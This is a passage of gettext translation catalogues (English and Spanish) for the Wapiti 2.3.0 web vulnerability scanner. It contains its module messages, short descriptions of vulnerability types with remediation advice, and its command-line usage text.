../attack/mod_crlf.py:31 msgid "CRLF Injection" msgstr "CRLF Injection" #: ../attack/mod_crlf.py:70 ../attack/mod_crlf.py:77 msgid "(QUERY_STRING)" msgstr "(QUERY_STRING)" #: ../attack/mod_crlf.py:121 msgid "Error: The server did not understand this request" msgstr "Error: The server did not understand this request" #: ../attack/mod_exec.py:45 msgid "Command execution" msgstr "Command execution" #: ../attack/mod_exec.py:48 msgid "PHP evaluation" msgstr "PHP evaluation" #: ../attack/mod_exec.py:51 ../attack/mod_exec.py:54 msgid "Warning exec" msgstr "Warning exec" #: ../attack/mod_exec.py:57 
../attack/mod_exec.py:63 msgid "preg_replace injection" msgstr "preg_replace injection" #: ../attack/mod_exec.py:60 msgid "Warning usort()" msgstr "Warning usort()" #: ../attack/mod_exec.py:66 msgid "Warning assert" msgstr "Warning assert" #: ../attack/mod_exec.py:69 msgid "Evalutation warning" msgstr "Evaluation warning" #: ../attack/mod_file.py:40 msgid "Remote inclusion vulnerability" msgstr "Remote inclusion vulnerability" #: ../attack/mod_file.py:41 msgid "Linux local file disclosure vulnerability" msgstr "Linux local file disclosure vulnerability" #: ../attack/mod_file.py:42 msgid "BSD local file disclosure vulnerability" msgstr "BSD local file disclosure vulnerability" #: ../attack/mod_file.py:43 msgid "Windows local file disclosure vulnerability" msgstr "Windows local file disclosure vulnerability" #: ../attack/mod_file.py:44 ../attack/mod_file.py:45 msgid "File disclosure vulnerability in include_path" msgstr "File disclosure vulnerability in include_path" #: ../attack/mod_file.py:46 msgid "highlight_file() vulnerability in basedir" msgstr "highlight_file() vulnerability in basedir" #: ../attack/mod_file.py:47 msgid "include() of file in include_path" msgstr "include() of file in include_path" #: ../attack/mod_file.py:84 msgid "Possible {0} vulnerability" msgstr "Possible {0} vulnerability" #: ../attack/mod_htaccess.py:75 msgid "HtAccess protection found: {0}" msgstr "HtAccess protection found: {0}" #: ../attack/mod_htaccess.py:85 msgid "|HTTP Code: {0} : {1}" msgstr "|HTTP Code: {0} : {1}" #: ../attack/mod_htaccess.py:88 ../attack/mod_htaccess.py:102 msgid "Source code:" msgstr "Source code:" #: ../attack/mod_htaccess.py:94 msgid "{0} HtAccess" msgstr "{0} HtAccess" #: ../attack/mod_htaccess.py:95 msgid " .htaccess bypass vulnerability: {0}" msgstr " .htaccess bypass vulnerability: {0}" #: ../attack/mod_htaccess.py:99 msgid "|HTTP Code: {0}" msgstr "|HTTP Code: {0}" #: ../attack/mod_nikto.py:75 msgid "Problem with local nikto database." 
msgstr "Problem with local nikto database." #: ../attack/mod_nikto.py:76 msgid "Downloading from the web..." msgstr "Downloading from the web..." #: ../attack/mod_nikto.py:90 msgid "Error downloading Nikto database" msgstr "Error downloading Nikto database" #: ../attack/mod_nikto.py:235 ../attack/mod_nikto.py:237 msgid "References:" msgstr "References:" #: ../attack/mod_permanentxss.py:57 msgid "Stored XSS vulnerability" msgstr "Stored XSS vulnerability" #: ../attack/mod_permanentxss.py:115 ../attack/mod_permanentxss.py:161 msgid "Found permanent XSS in {0} with {1}" msgstr "Found permanent XSS in {0} with {1}" #: ../attack/mod_permanentxss.py:213 ../attack/mod_permanentxss.py:280 msgid "Found permanent XSS attacked by {0} with fields {1}" msgstr "Found permanent XSS attacked by {0} with fields {1}" #: ../attack/mod_sql.py:39 ../attack/mod_sql.py:41 msgid "MySQL Injection" msgstr "MySQL Injection" #: ../attack/mod_sql.py:43 msgid "Access-Based SQL Injection" msgstr "Access-Based SQL Injection" #: ../attack/mod_sql.py:45 ../attack/mod_sql.py:47 ../attack/mod_sql.py:49 #: ../attack/mod_sql.py:70 msgid "MSSQL-Based Injection" msgstr "MSSQL-Based Injection" #: ../attack/mod_sql.py:52 msgid "Java.SQL Injection" msgstr "Java.SQL Injection" #: ../attack/mod_sql.py:54 msgid "PostgreSQL Injection" msgstr "PostgreSQL Injection" #: ../attack/mod_sql.py:56 ../attack/mod_sql.py:58 msgid "XPath Injection" msgstr "XPath Injection" #: ../attack/mod_sql.py:60 msgid "LDAP Injection" msgstr "LDAP Injection" #: ../attack/mod_sql.py:62 msgid "DB2 Injection" msgstr "DB2 Injection" #: ../attack/mod_sql.py:64 msgid "Interbase Injection" msgstr "Interbase Injection" #: ../attack/mod_sql.py:66 msgid "Sybase Injection" msgstr "Sybase Injection" #: ../attack/mod_sql.py:68 msgid ".NET SQL Injection" msgstr ".NET SQL Injection" #: ../attack/mod_sql.py:72 msgid "Acess-Based SQL Injection" msgstr "Acess-Based SQL Injection" #: ../attack/mod_sql.py:76 msgid "Oracle Injection" msgstr "Oracle 
Injection" #: ../attack/mod_xss.py:59 msgid "XSS vulnerability" msgstr "XSS vulnerability" #: ../attack/mod_xss.py:126 ../attack/mod_xss.py:337 msgid "XSS vulnerability found via injection in the resource path" msgstr "XSS vulnerability found via injection in the resource path" #: ../attack/mod_xss.py:196 msgid "XSS vulnerability found via injection in the query string" msgstr "XSS vulnerability found via injection in the query string" #: ../attack/mod_xss.py:270 ../attack/mod_xss.py:437 msgid "XSS vulnerability found via injection in the parameter {0}" msgstr "XSS vulnerability found via injection in the parameter {0}" #: ../net/getcookie.py:97 msgid "No forms found in this page !" msgstr "No forms found in this page !" #: ../net/getcookie.py:104 msgid "Choose the form you want to use :" msgstr "Choose the form you want to use :" #: ../net/getcookie.py:113 msgid "Enter a number : " msgstr "Enter a number : " #: ../net/getcookie.py:120 msgid "Please enter values for the following form: " msgstr "Please enter values for the following form: " #: ../net/getcookie.py:121 msgid "url = {0}" msgstr "url = {0}" #: ../net/cookie.py:75 msgid "Error getting url {0}" msgstr "Error getting url {0}" #: ../net/lswww.py:164 msgid "First argument must be the root url !" msgstr "First argument must be the root url !" #: ../net/lswww.py:169 msgid "Invalid protocol: {0}" msgstr "Invalid protocol: {0}" #: ../net/lswww.py:208 msgid "Invalid link argument: {0}" msgstr "Invalid link argument: {0}" #: ../net/lswww.py:266 msgid "Connection refused!" msgstr "Connection refused!" 
#: ../net/lswww.py:270 msgid "Exception in lswww.browse: {0}" msgstr "Exception in lswww.browse: {0}" #: ../net/lswww.py:665 msgid "File {0} loaded, the scan continues:" msgstr "File {0} loaded, the scan continues:" #: ../net/lswww.py:667 msgid " * URLs to browse" msgstr " * URLs to browse" #: ../net/lswww.py:670 msgid " * URLs browsed" msgstr " * URLs browsed" #: ../net/lswww.py:674 msgid "File {0} not found, Wapiti will scan again the web site" msgstr "File {0} not found, Wapiti will scan again the web site" #: ../net/lswww.py:707 ../net/lswww.py:715 msgid " Notice" msgstr " Notice" #: ../net/lswww.py:709 msgid "This scan has been saved in the file {0}/{1}.xml" msgstr "This scan has been saved in the file {0}/{1}.xml" #: ../net/lswww.py:711 msgid "You can use it to perform attacks without scanning again the web site with the \"-k\" parameter" msgstr "You can use it to perform attacks without scanning again the web site with the \"-k\" parameter" #: ../net/lswww.py:717 msgid "Scan stopped, the data has been savedin the file {0}/{1}.xml" msgstr "Scan stopped, the data has been saved in the file {0}/{1}.xml" #: ../net/lswww.py:719 msgid "To continue this scan, you should launch Wapiti with the \"-i\" parameter" msgstr "To continue this scan, you should launch Wapiti with the \"-i\" parameter" #: ../net/lswww.py:729 msgid "URLs" msgstr "URLs" #: ../net/lswww.py:736 msgid "Forms Info" msgstr "Forms Info" #: ../net/lswww.py:738 msgid "From: {0}" msgstr "From: {0}" #: ../net/lswww.py:739 msgid "To: {0}" msgstr "To: {0}" #: ../net/lswww.py:747 msgid "Upload Scripts" msgstr "Upload Scripts" #: ../net/lswww.py:1008 msgid "Forms" msgstr "Forms" #: ../net/lswww.py:1011 msgid "Form {0}" msgstr "Form {0}" #: ../net/lswww.py:1015 msgid " * Method: {0}" msgstr " * Method: {0}" #: ../net/lswww.py:1016 msgid " * Intputs:" msgstr " * Inputs:" #: ../net/lswww.py:1021 msgid " * Selects:" msgstr " * Selects:" #: ../net/lswww.py:1026 msgid " * TextAreas:" msgstr " * TextAreas:" #: 
../net/lswww.py:1032 msgid "URLS" msgstr "URLS" #: ../report/txtreportgenerator.py:69 msgid "Report for {0}\n" msgstr "Report for {0}\n" #: ../report/txtreportgenerator.py:70 msgid "Date of the scan : {0}\n" msgstr "Date of the scan : {0}\n" #: ../report/txtreportgenerator.py:72 msgid "Scope of the scan : {0}\n" msgstr "Scope of the scan : {0}\n" #: ../report/txtreportgenerator.py:75 msgid "Summary of vulnerabilities :" msgstr "Summary of vulnerabilities :" #: ../report/txtreportgenerator.py:78 msgid "{0} : {1:>3}\n" msgstr "{0} : {1:>3}\n" #: ../report/txtreportgenerator.py:88 ../report/txtreportgenerator.py:105 msgid "Evil request:\n" msgstr "Evil request:\n" #: ../report/txtreportgenerator.py:91 msgid "cURL command PoC : \"{0}\"" msgstr "cURL command PoC : \"{0}\"" #: ../report/txtreportgenerator.py:97 msgid "Anomalies found:" msgstr "Anomalies found:" #: ../wapiti.py:560 ../wapiti.py:559 msgid "Attack process interrupted. To perform again the attack, lauch Wapiti with \"-i\" or \"-k\" parameter." msgstr "Attack process interrupted. To perform again the attack, launch Wapiti with \"-i\" or \"-k\" parameter." #: ../wapiti.py:551 msgid "File {0} not found. Wapiti will scan the web site again" msgstr "File {0} not found. Wapiti will scan the web site again" msgid "[!] Unable to find a module named {0}" msgstr "[!] Unable to find a module named {0}" msgid "Backup file description" msgstr "" "It may be possible to find backup files of scripts on the webserver that " "the web-admin put here to save a previous version or backup files that are " "automatically generated by the software editor used (like for example Emacs). " "These copies may reveal interesting information like source code or " "credentials" msgid "Backup file solution" msgstr "" "The webadmin must manually delete the backup files or remove them from the web " "root. He should also reconfigure his editor to deactivate automatic backups."
msgid "Blind SQL Injection description" msgstr "" "Blind SQL injection is a technique that exploits a vulnerability occurring " "in the database of an application. This kind of vulnerability is harder to " "detect than basic SQL injections because no error message will be displayed " "on the webpage." msgid "Blind SQL Injection solution" msgstr "" "To protect against SQL injection, user input must not directly be embedded " "in SQL statements. Instead, user input must be escaped or filtered or " "parameterized statements must be used." msgid "Commands execution description" msgstr "" "This attack consists in executing system commands on the server. The " "attacker tries to inject these commands in the request parameters" msgid "Commands execution solution" msgstr "Prefer working without user input when using file system calls" msgid "CRLF description" msgstr "" "The term CRLF refers to Carriage Return (ASCII 13, \\r) Line Feed (ASCII 10, " "\\n). They're used to note the termination of a line, however, dealt with " "differently in today's popular Operating Systems. For example: in Windows " "both a CR and LF are required to note the end of a line, whereas in Linux/" "UNIX a LF is only required. This combination of CR and LF is used for " "example when pressing 'Enter' on the keyboard. Depending on the application " "being used, pressing 'Enter' generally instructs the application to start a " "new line, or to send a command." msgid "CRLF solution" msgstr "" "Check the submitted parameters and do not allow CRLF to be injected by " "filtering CRLF" msgid "Cross Site Scripting description" msgstr "" "Cross-site scripting (XSS) is a type of computer security vulnerability " "typically found in web applications which allow code injection by malicious " "web users into the web pages viewed by other users. Examples of such code " "include HTML code and client-side scripts."
msgid "Cross Site Scripting solution" msgstr "" "The best way to protect a web application from XSS attacks is to ensure that " "the application performs validation of all headers, cookies, query strings, " "form fields, and hidden fields. Encoding user supplied output in the server " "side can also defeat XSS vulnerabilities by preventing inserted scripts from " "being transmitted to users in an executable form. Applications can gain " "significant protection from javascript based attacks by converting the " "following characters in all generated output to the appropriate HTML entity " "encoding: <, >, &, \", ', (, ), #, %, ; , +, -." msgid "File Handling description" msgstr "" "This attack is also known as Path or Directory Traversal, its " "aim is the access to files and directories that are stored outside the web " "root folder. The attacker tries to explore the directories stored in the web " "server. The attacker uses some techniques, for instance, the manipulation of " "variables that reference files with 'dot-dot-slash (../)' sequences and its " "variations to move up to root directory to navigate through the file system." msgid "File Handling solution" msgstr "" "Prefer working without user input when using file system calls. Use " "indexes rather than actual portions of file names when templating or using " "language files (eg: value 5 from the user submission = Czechoslovakian, " "rather than expecting the user to return 'Czechoslovakian'). Ensure the " "user cannot supply all parts of the path - surround it with your path code. " "Validate the user's input by only accepting known good - do not sanitize " "the data. Use chrooted jails and code access policies to restrict where " "the files can be obtained or saved to." msgid "Htaccess bypass description" msgstr "" "htaccess files are used to restrict access to some files or HTTP method. In " "some case it may be possible to bypass this restriction and access the files."
msgid "Htaccess bypass solution" msgstr "Make sure every HTTP method is forbidden if the credentials are bad." msgid "Internal server error description" msgstr "An error occurred on the server's side, preventing it from processing the request. It may be the sign of a vulnerability." msgid "Internal server error solution" msgstr "More information about the error should be found in the server logs." msgid "Potentially dangerous file description" msgstr "A file with potential vulnerabilities has been found on the website." msgid "Potentially dangerous file solution" msgstr "Make sure the script is up-to-date and restrict access to it if possible" msgid "Resource consumption description" msgstr "It took an abnormal time to the server to respond to a query. An attacker might leverage this kind of weakness to overload the server" msgid "Resource consumption solution" msgstr "The involved script is maybe using the server resources (CPU, memory, network, file access...) in a non-efficient way" msgid "SQL Injection description" msgstr "" "SQL injection vulnerabilities allow an attacker to alter the queries executed on the backend database. " "An attacker may then be able to extract or modify information stored in the database or even escalate his privileges on the system." msgid "SQL Injection solution" msgstr "" "To protect against SQL injection, user input must not directly be embedded " "in SQL statements. Instead, user input must be escaped or filtered or " "parameterized statements must be used."
wapiti-2.3.0+dfsg/wapitiCore/language_sources/es.po
# Copyright (C) YEAR 2009-2013 Nicolas SURRIBAS # This file is distributed under the same license as the Wapiti package.
# #, fuzzy msgid "" msgstr "" "Project-Id-Version: Wapiti SVN\n" "Report-Msgid-Bugs-To: \n" "POT-Creation-Date: 2013-08-25 17:33+0200\n" "PO-Revision-Date: 2013-09-17 23:16+0200\n" "Last-Translator: David del Pozo Gonzalez \n" "Language-Team: David del Pozo Gonzalez \n Alberto Pastor Nieto " "Language: Spanish\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" #: ../vulnerability.py:23 msgid " Evil url: {0}" msgstr " URL maliciosa: {0}" #: ../vulnerability.py:24 msgid "{0} in {1} via injection in the parameter {2}" msgstr "{0} en {1} mediante inyección en el parámetro {2}" #: ../vulnerability.py:25 msgid " coming from {0}" msgstr " viniendo de {0}" #: ../vulnerability.py:26 msgid "{0} in {1} via injection in the query string" msgstr "{0} en {1} mediante inyección en la query de la URL" #: ../vulnerability.py:27 msgid "{0} in {1} via injection in the resource path" msgstr "{0} en {1} mediante inyección en la ruta al recurso" #: ../vulnerability.py:28 msgid "Involved parameter: {0}" msgstr "Parámetro involucrado: {0}" #: ../vulnerability.py:29 msgid "Evil request:" msgstr "Petición maliciosa:" #: ../vulnerability.py:67 msgid "SQL Injection" msgstr "Inyección SQL" #: ../vulnerability.py:68 msgid "Blind SQL Injection" msgstr "Inyección SQL a ciegas" #: ../vulnerability.py:69 msgid "File Handling" msgstr "Manejo de fichero" #: ../vulnerability.py:70 msgid "Cross Site Scripting" msgstr "Cross Site Scripting" #: ../vulnerability.py:71 msgid "CRLF" msgstr "CRLF" #: ../vulnerability.py:72 msgid "Commands execution" msgstr "Ejecución de comandos" #: ../vulnerability.py:73 msgid "Htaccess Bypass" msgstr "Bypass de Htaccess" #: ../vulnerability.py:74 msgid "Backup file" msgstr "Fichero de backup" #: ../vulnerability.py:75 msgid "Potentially dangerous file" msgstr "Fichero potencialmente peligroso" #: ../vulnerability.py:80 msgid "Internal Server Error" msgstr "Error interno del servidor" #: ../vulnerability.py:81 msgid 
"Resource consumption" msgstr "Consumo de recursos" #: ../vulnerability.py:83 msgid "Received a HTTP 500 error in {0}" msgstr "Recibido un error HTTP 500 en {0}" #: ../vulnerability.py:84 msgid "Timeout occured in {0}" msgstr "Timeout ocurrido en {0}" #: ../vulnerability.py:86 msgid "The request timed out while attempting to inject a payload in the query string" msgstr "Timeout en la petición cuando se intentaba realizar inyectar una cadena maliciosa en la query de la URL" #: ../vulnerability.py:87 msgid "The request timed out while attempting to inject a payload in the resource path" msgstr "Timeout en la petición cuando se intentaba realizar inyectar una cadena maliciosa en la ruta al recurso" #: ../vulnerability.py:88 msgid "The request timed out while attempting to inject a payload in the parameter {0}" msgstr "Timeout en la petición cuando se intentaba realizar inyectar una cadena maliciosa en el parámetro {0}" #: ../vulnerability.py:90 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the query string" msgstr "El servidor devolvió un error HTTP 500 cuando se intentaba inyectar una cadena maliciosa en la query de la URL" #: ../vulnerability.py:92 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the resource path" msgstr "El servidor devolvió un error HTTP 500 cuando se intentaba inyectar una cadena maliciosa en el resource path" #: ../vulnerability.py:94 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}" msgstr "El servidor devolvió un error HTTP 500 cuando se intentaba inyectar una cadena maliciosa en el parámetro {0}" #: ../wapiti.py:69 msgid "Invalid argument for option {0} : {1}" msgstr "Argumento inválido para la opción {0} : {1}" #: ../wapiti.py:226 msgid "[*] Loading modules:" msgstr "[*] Cargando modulos:" #: ../wapiti.py:297 msgid "No links or forms found in this page !" 
msgstr "No se han encontrado enlaces ni formularios en esta página" #: ../wapiti.py:298 msgid "Make sure the url is correct." msgstr "Compruebe que la URL es correcta." #: ../wapiti.py:310 msgid "[!] Missing dependecies for module {0}:" msgstr "[!] Dependencias no encontradas para el módulo {0}:" #: ../wapiti.py:316 msgid "[+] Launching module {0}" msgstr "[+] Lanzando módulo {0}" #: ../wapiti.py:321 msgid "Upload scripts found:" msgstr "Scripts de subida encontrados:" #: ../wapiti.py:335 msgid "Report" msgstr "Informe" #: ../wapiti.py:337 msgid "A report has been generated in the file {0}" msgstr "Se ha generado un informe en el fichero {0}" #: ../wapiti.py:339 msgid "Open {0}/index.html with a browser to see this report." msgstr "Abrir {0}/index.html con el navegador para ver el informe" #: ../wapiti.py:410 msgid "wapitiDoc" msgstr "" "Wapiti-2.3.0 - Web application vulnerability scanner \n" " \n" " Uso: python wapiti.py http://server.com/base/url/ [options] \n" " \n" " Las opciones soportadas son: \n" " -s \n" " --start \n" " \tPara indicar una URL con la que comenzar el escaneo. Esta opción puede ser usada varias veces.\n" " \tWapiti escaneará esos enlaces para encontrar más URLs incluso si el enlace especificado no está en el ámbito.\n" " \n" " -x \n" " --exclude \n" " \tPara excluir una URL del escaneo (por ejemplo URLs de logout). Esta opción puede ser llamada varias veces para especificar varias URLs.\n" " \tLos comodines (*) se pueden usar en las URL como si fuesen expresiones regulares simples.\n" " \tEjemplo : -x http://server/base/?page=*&module=test\n" " \to -x http://server/base/admin/* para excluir un directorio.\n" " \n" " -p \n" " --proxy \n" " \tPara especificar un proxy. Actualmente los proxies soportados son HTTP y HTTPS.\n" " \tEsta opción puede ser llamada dos veces para especificar el proxy HTTP y HTTPS.\n" " \tEjemplo: -p http://proxy:port/\n" " \n" " -c \n" " --cookie \n" " \tPara importar cookies que se usarán en el escaneo. 
La cookie debe ser un fichero en formato JSON.\n" " \tLas cookies pueden ser generadas usando los programas cookie.py y getcookie.py (directorio \"net\").\n" " \n" " -t \n" " --timeout \n" " \tPara establecer un timeout (tiempo máximo en segundo a esperar a la respuesta del servidor).\n" " \n" " -a \n" " --auth \n" " \tEstablece las credenciales para la autentificación HTTP.\n" " \n" " --auth-method \n" " \tSi el servidor requiere autenticación, establece el método a usar en la autenticación.\n" " \tActualmente los métodos soportados son (algunos requieren instalar módulos adicionales):\n" " \t\t+ basic\n" " \t\t+ digest\n" " \t\t+ kerberos\n" " \t\t+ ntlm\n" " \n" " -r \n" " --remove \n" " \tBorra un parámetro (nombre y valor) de las URLs.\n" " \n" " -n \n" " --nice \n" " \tDefine un límite de URLs a escanear con el mismo patrón (por ejemplo, el número máximo de valores únicos para el mismo parámetro).\n" " \tUsa esta opción para prevenir bucles infinitos durante el escaneo. El límite debe ser mayor que 0.\n" " \n" " -m \n" " --module \n" " \tEstablece los módulos (y métodos HTTP para cada módulo) para usar en los ataques.\n" " \tPrefix a module name with a dash to deactivate the related module.\n" " \tTo only browse the target (without sending any payloads), deactivate every module with -m \"-all\".\n" " \tIf you don't specify the HTTP methods, GET and POST will be used.\n" " \tExample: -m \"-all,xss:get,exec:post\"\n" " \n" " -u \n" " --color \n" " \tUsa colores para resaltar las vulnerabilidades y anomalias en la salida. \n" " \n" " -v \n" " --verbose \n" " \tEstablece el nivel de logs por pantalla. \n" " \t0: bajo (por defecto), 1: pinta cada URL, 2: pinta cada ataque. 
\n" " \n" " -b \n" " --scope \n" " \tEstablece el ámbito del escaneo:\n" " \t\t+ page: analiza solo la página pasada a Wapiti como URL raíz.\n" " \t\t+ folder: analiza todas las URL bajo la misma URL raíz pasado a Wapiti (por defecto).\n" " \t\t+ domain: analiza todos los enlaces a páginas que están en el mismo dominio que la URL pasada a Wapiti.\n" " \n" " -f \n" " --format \n" " \tEstablece el formato del informe. \n" " \tjson: Formato JSON format \n" " \thtml: Formato HTML format (default)\n" " \topenvas: Formato OpenVAS XML \n" " \ttxt: Informe en texto plano (UTF-8) \n" " \tvulneranet: Informe en formato VulneraNET (basado en XML)\n" " \txml: Formato XML\n" " \n" " -o \n" " --output \n" " \tEstablece el nombre del fichero con el informe. \n" " \tSi se selecciona HTML como formato del informe, este parámetro será el nombre del directorio donde se guarda el informe.\n" " \n" " -i \n" " --continue \n" " \tEste parámetro indica a Wapiti reanudar el escaneo previo guardado en el fichero XML especificado\n" " \tEl nombre del fichero es opcional, si no se especifica Wapiti toma el fichero por defecto de la carpeta \"scans\".\n" " \n" " -k \n" " --attack \n" " \tEste parámetro indica a Wapiti reanudar los ataques sin escanear de nuevo el website, cargando el escaneo del fichero especificado.\n" " \tEl nombre del fichero es opcional, si no se especifica Wapiti toma el fichero por defecto de la carpeta \"scans\".\n" " \n" " --verify-ssl <0|1>\n" " \tEste parámetro indica si Wapiti debe comprobar certificados SSL.\n" " \tPor defecto se verifican los certificados\n" " \n" " -h \n" " --help \n" " \tPara imprimir este mensaje de uso de la aplicación\n" " " #: ../wapiti.py:418 msgid "Wapiti-2.3.0 (wapiti.sourceforge.net)" msgstr "Wapiti-2.3.0 (wapiti.sourceforge.net)" #: ../wapiti.py:549 msgid "File {0} loaded. Wapiti will use it to perform the attack" msgstr "Archivo {0} cargado. 
Wapiti lo usará para realizar el ataque" #: ../attack/attack.py:166 msgid "+ attackGET {0}" msgstr "+ attackGET {0}" #: ../attack/attack.py:171 ../attack/attack.py:185 #: ../attack/mod_permanentxss.py:87 ../attack/mod_permanentxss.py:89 #: ../attack/mod_permanentxss.py:147 ../attack/mod_permanentxss.py:272 msgid "error: {0} while attacking {1}" msgstr "error: {0} mientras se realizaba el ataque {1}" #: ../attack/attack.py:173 ../attack/attack.py:187 msgid "error: timeout while attacking {0}" msgstr "error: timeout mientras se atacaba {0}" #: ../attack/attack.py:180 msgid "+ attackPOST {0} from {1}" msgstr "+ attackPOST {0} de {1}" #: ../attack/mod_backup.py:89 msgid "Found backup file !" msgstr "¡Encontrado fichero de backup!" #: ../attack/mod_backup.py:94 msgid "Backup file {0} found for {1}" msgstr "Fichero de backup {0} encontrado para {1}" #: ../attack/mod_blindsql.py:40 msgid "Blind SQL vulnerability" msgstr "Inyección SQL ciega" #: ../attack/mod_blindsql.py:93 ../attack/mod_file.py:146 #: ../attack/mod_sql.py:131 msgid "{0} via injection in the query string" msgstr "{0} mediante inyección en la query de la URL" #: ../attack/mod_blindsql.py:141 ../attack/mod_blindsql.py:222 #: ../attack/mod_exec.py:195 ../attack/mod_exec.py:292 #: ../attack/mod_file.py:211 ../attack/mod_file.py:301 #: ../attack/mod_sql.py:258 msgid "{0} via injection in the parameter {1}" msgstr "{0} mediante inyección en el parámetro {1}" #: ../attack/mod_crlf.py:31 msgid "CRLF injection" msgstr "Inyección CRLF" #: ../attack/mod_crlf.py:70 ../attack/mod_crlf.py:77 msgid "(QUERY_STRING)" msgstr "(QUERY_STRING)" #: ../attack/mod_crlf.py:121 msgid "Error: The server did not understand this request" msgstr "Error: El servidor no entendió esta petición" #: ../attack/mod_exec.py:45 msgid "Command execution" msgstr "Ejecución de comando" #: ../attack/mod_exec.py:48 msgid "PHP evaluation" msgstr "Evaluación PHP" #: ../attack/mod_exec.py:51 ../attack/mod_exec.py:54 msgid "Warning exec" msgstr "Warning 
exec" #: ../attack/mod_exec.py:57 ../attack/mod_exec.py:63 msgid "preg_replace injection" msgstr "Inyección preg_replace" #: ../attack/mod_exec.py:60 msgid "Warning usort()" msgstr "Warning usort()" #: ../attack/mod_exec.py:66 msgid "Warning assert" msgstr "Warning assert" #: ../attack/mod_exec.py:69 msgid "Evalutation warning" msgstr "Evalutation warning" #: ../attack/mod_file.py:40 msgid "Remote inclusion vulnerability" msgstr "Vulnerabilidad de inclusión remota" #: ../attack/mod_file.py:41 msgid "Linux local file disclosure vulnerability" msgstr "Vulnerabilidad 'Local file disclosure' en Linux" #: ../attack/mod_file.py:42 msgid "BSD local file disclosure vulnerability" msgstr "Vulnerabilidad de 'Local file disclosure' en BSD" #: ../attack/mod_file.py:43 msgid "Windows local file disclosure vulnerability" msgstr "Vulnerabilidad de 'Local file disclosure' en Windows" #: ../attack/mod_file.py:44 ../attack/mod_file.py:45 msgid "File disclosure vulnerability in include_path" msgstr "Vulnerabilidad de 'Local file disclosure' en include_path" #: ../attack/mod_file.py:46 msgid "highlight_file() vulnerability in basedir" msgstr "Vulnerabilidad highlight_file() en basedir" #: ../attack/mod_file.py:47 msgid "include() of file in include_path" msgstr "include() de fichero en include_path" #: ../attack/mod_file.py:84 msgid "Possible {0} vulnerability" msgstr "Posible vulnerabilidad {0}" #: ../attack/mod_htaccess.py:75 msgid "HtAccess protection found: {0}" msgstr "Protección HtAccess encontrada: {0}" #: ../attack/mod_htaccess.py:85 msgid "|HTTP Code: {0} : {1}" msgstr "|HTTP Code: {0} : {1}" #: ../attack/mod_htaccess.py:88 ../attack/mod_htaccess.py:102 msgid "Source code:" msgstr "Código fuente:" #: ../attack/mod_htaccess.py:94 msgid "{0} HtAccess" msgstr "HtAccess {0}" #: ../attack/mod_htaccess.py:95 msgid " .htaccess bypass vulnerability: {0}" msgstr " Vulnerabilidad de bypass de .htaccess: {0}" #: ../attack/mod_htaccess.py:99 msgid "|HTTP Code: {0}" msgstr "|Código HTTP: 
{0}" #: ../attack/mod_nikto.py:75 msgid "Problem with local nikto database." msgstr "Problema con la base de datos local Nikto" #: ../attack/mod_nikto.py:76 msgid "Downloading from the web..." msgstr "Descargando de la web..." #: ../attack/mod_nikto.py:90 msgid "Error downloading Nikto database" msgstr "Error descargando la base de datos Nikto" #: ../attack/mod_nikto.py:235 ../attack/mod_nikto.py:237 msgid "References:" msgstr "Referencias:" #: ../attack/mod_permanentxss.py:57 msgid "Stored XSS vulnerability" msgstr "Guardada vulnerabilidad XSS" #: ../attack/mod_permanentxss.py:115 ../attack/mod_permanentxss.py:161 msgid "Found permanent XSS in {0} with {1}" msgstr "Encontrada XSS permanente en {0} con {1}" #: ../attack/mod_permanentxss.py:213 ../attack/mod_permanentxss.py:280 msgid "Found permanent XSS attacked by {0} with fields {1}" msgstr "Encontrado XSS permanente atacando {0} con campos {1}" #: ../attack/mod_sql.py:39 ../attack/mod_sql.py:41 msgid "MySQL Injection" msgstr "Inyección MySQL" #: ../attack/mod_sql.py:43 msgid "Access-Based SQL Injection" msgstr "Inyección SQL en sistema Access" #: ../attack/mod_sql.py:45 ../attack/mod_sql.py:47 ../attack/mod_sql.py:49 #: ../attack/mod_sql.py:70 msgid "MSSQL-Based Injection" msgstr "Inyección MSSQL" #: ../attack/mod_sql.py:52 msgid "Java.SQL Injection" msgstr "Inyección Java.SQL" #: ../attack/mod_sql.py:54 msgid "PostgreSQL Injection" msgstr "Inyección PostgreSQL" #: ../attack/mod_sql.py:56 ../attack/mod_sql.py:58 msgid "XPath Injection" msgstr "Inyección XPath" #: ../attack/mod_sql.py:60 msgid "LDAP Injection" msgstr "Inyección LDAP" #: ../attack/mod_sql.py:62 msgid "DB2 Injection" msgstr "Inyección DB2" #: ../attack/mod_sql.py:64 msgid "Interbase Injection" msgstr "Inyección Interbase" #: ../attack/mod_sql.py:66 msgid "Sybase Injection" msgstr "Inyección Sybase" #: ../attack/mod_sql.py:68 msgid ".NET SQL Injection" msgstr "Inyección .NET SQL" #: ../attack/mod_sql.py:72 msgid "Acess-Based SQL Injection" msgstr 
"Inyección Acess-Based SQL" #: ../attack/mod_sql.py:76 msgid "Oracle Injection" msgstr "Inyección Oracle" #: ../attack/mod_xss.py:59 msgid "XSS vulnerability" msgstr "Vulnerabilidad XSS" #: ../attack/mod_xss.py:126 ../attack/mod_xss.py:337 msgid "XSS vulnerability found via injection in the resource path" msgstr "Vulnerabilidad XSS encontrada mediante inyección en la ruta al recurso" #: ../attack/mod_xss.py:196 msgid "XSS vulnerability found via injection in the query string" msgstr "Vulnerabilidad XSS encontrada mediante inyección en la query de la URL" #: ../attack/mod_xss.py:270 ../attack/mod_xss.py:437 msgid "XSS vulnerability found via injection in the parameter {0}" msgstr "Vulnerabilidad XSS encontrada mediante inyección en el parámetro {0}" #: ../net/getcookie.py:97 msgid "No forms found in this page !" msgstr "No se han encontrado formularios en esta página" #: ../net/getcookie.py:104 msgid "Choose the form you want to use :" msgstr "Elige el formulario que deseas usar:" #: ../net/getcookie.py:113 msgid "Enter a number : " msgstr "Elige un número:" #: ../net/getcookie.py:120 msgid "Please enter values for the following form: " msgstr "Por favor, introduce valores para este formulario: " #: ../net/getcookie.py:121 msgid "url = {0}" msgstr "url = {0}" #: ../net/cookie.py:75 msgid "Error getting url {0}" msgstr "Error recuperando la URL {0}" #: ../net/lswww.py:164 msgid "First argument must be the root url !" msgstr "El primer argumento debe ser la URL raíz" #: ../net/lswww.py:169 msgid "Invalid protocol: {0}" msgstr "Protocolo inválido: {0}" #: ../net/lswww.py:208 msgid "Invalid link argument: {0}" msgstr "En argumento no es un enlace válido: {0}" #: ../net/lswww.py:266 msgid 